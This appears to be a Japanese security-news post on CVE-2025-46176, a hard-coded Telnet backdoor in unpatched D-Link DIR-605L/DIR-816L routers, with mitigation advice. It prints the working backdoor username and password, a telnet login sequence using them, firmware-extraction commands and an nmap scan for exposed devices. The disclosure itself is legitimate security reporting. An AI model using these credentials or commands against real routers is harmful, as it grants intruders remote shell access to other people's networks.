D-Link Routers Exposed by Hard-Coded Telnet Credential
2025/05/26 gbhackers — 先日に公開された D-Link の DIR-605L/DIR-816L ルーターの深刻な脆弱性 CVE-2025-46176 は、ハードコードされた Telnet 認証情報を悪用する攻撃者に、リモート・コマンド実行を許すものである。この脆弱性が影響を及ぼす範囲は、ファームウェア・バージョン 2.13B01 (DIR-605L)/2.06B01 (DIR-816L) であり、深刻度は CVSS v3.1:6.5 (Medium) と評価されている。セキュリティ研究者たちの指摘は、不適切なコマンド無効化 (CWE-77) に原因があり、ファームウェアを解析する攻撃者は、認証回避の可能性を得るというものだ。

ファームウェア・バックドアの技術分析
研究者たちは binwalk を用いてファームウェアを抽出し、脆弱なコンポーネントを取り込んだ SquashFS ファイル・システムを発見した。DIR-605L/DIR-816L は、ハードコードされた認証情報で初期化する “./bin/telnetd.sh” を介して Telnet サービスを実行する。
bash# DIR-605L v2.13B01 telnetd.sh snippet
/usr/sbin/telnetd -l /bin/sh -u Alphanetworks:$image_sign
上記の $image_sign 変数は “./etc/alpha_config/image_sign” から認証情報を取得し、Wj5eH%JC のような平文のパスワードを公開する。
以下の方法により攻撃者は、この脆弱性を悪用できる。
bashtelnet 192.168.0.1
Username: Alphanetworks
Password: Wj5eH%JC
研究者たちによるファームウェア分析スクリプトは、以下のコマンドを使用して、この脆弱性を特定した。
bashbinwalk -eM DIR605L_FW_2.13B01.bin
grep -r "Alphanetworks" squashfs-root
cat squashfs-root/etc/alpha_config/image_sign
悪用される可能性とリスク評価
この脆弱性により、未認証の攻撃者は、以下の操作を実行できる。
- Telnet 経由による任意のコマンド実行
- ルーター・コンフィグレーションの変更
- マルウェアの展開および、内部ネットワークへの侵入
EPSS スコアは 0.04% であり、実際に悪用される可能性は低いとされるが、依然として高リスクの脆弱性だと認識すべきだ。
さらに、ファームウェア・パッチが提供されていないため、パブリック・ネットワークに公開されているデバイスのリスクは増大する。
セキュリティ・アナリストは以下の点を強調している。
bashnmap -p 23 <target_IP> # Identifies vulnerable Telnet services
緩和策とベンダーの対応
この問題をセキュリティ情報で認めた D-Link は、ユーザーに対して以下の対策を促している。
- 管理インターフェースから Telnet サービスを無効化
- 管理ポートへの WAN アクセスを制限
- ファームウェア更新の監視
2025年5月末の時点で、公式パッチは存在しない。一時的な回避策として、以下が提示されている。
bashiptables -A INPUT -p tcp --dport 23 -j DROP # Blocks Telnet traffic
この脆弱性が浮き乗りにするのは、IoT デバイスにおける、特にアップデート・サポートが限られているレガシー・モデルにおける、ハードコードされた認証情報のリスクである。
ネットワーク管理者にとって必要なことは、product:”DIR-605L” のなどの Shodan クエリを使用してデバイスを監査し、ネットワーク・セグメンテーションを実装することだ。
D-Link DIR-605L/DIR-816L に RCE 脆弱性とのことですが、現時点ではパッチが存在しないとのことです。当該製品をご利用のチームは、文中の回避策を、ご参照ください。よろしければ、D-Link で検索/Router で検索も、ご利用ください。
You must be logged in to post a comment.